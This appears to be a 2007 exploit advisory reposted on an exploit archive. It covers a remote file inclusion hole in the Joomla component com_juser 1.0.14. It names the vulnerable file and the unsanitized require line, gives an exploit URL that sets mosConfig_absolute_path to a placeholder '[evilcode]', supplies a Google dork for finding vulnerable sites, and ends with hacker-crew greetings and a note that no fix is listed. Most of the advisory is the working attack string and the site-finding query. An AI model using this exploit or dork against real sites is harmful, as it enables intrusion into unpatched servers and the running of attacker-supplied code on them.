Joomla Component JUser 1.0.14 Remote File Inclusion Vulnerability

2007-11-19 00:00:00

==================================================================================================================================

# JUser Joomla Component 1.0.14 Remote File Include Vulnerability

Component : com_juser version 1.0.14 - paid component
Vendor : www.joomlaequipment.com
Discovered by : NoGe
Contact : pace[dot]noge[at]hotmail[dot]com

==================================================================================================================================

# Vulnerable file

/administrator/components/com_juser/xajax_functions.php

line 4 require ($mosConfig_absolute_path.'/administrator/components/com_juser/xajax/xajax_core/xajax.inc.php');



# Exploit

http://localhost/path/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=[evilcode]



# D0rk

inurl:com_juser

==================================================================================================================================

# Greetz

all crew #papuahacker #baliemhackerlink #nyubicrew
skulmatic OLiBekaS ulga Cungkee nyubi k1tk4t str0ke newbie
yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ haliq
http://kapukvalley.net member

==================================================================================================================================

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.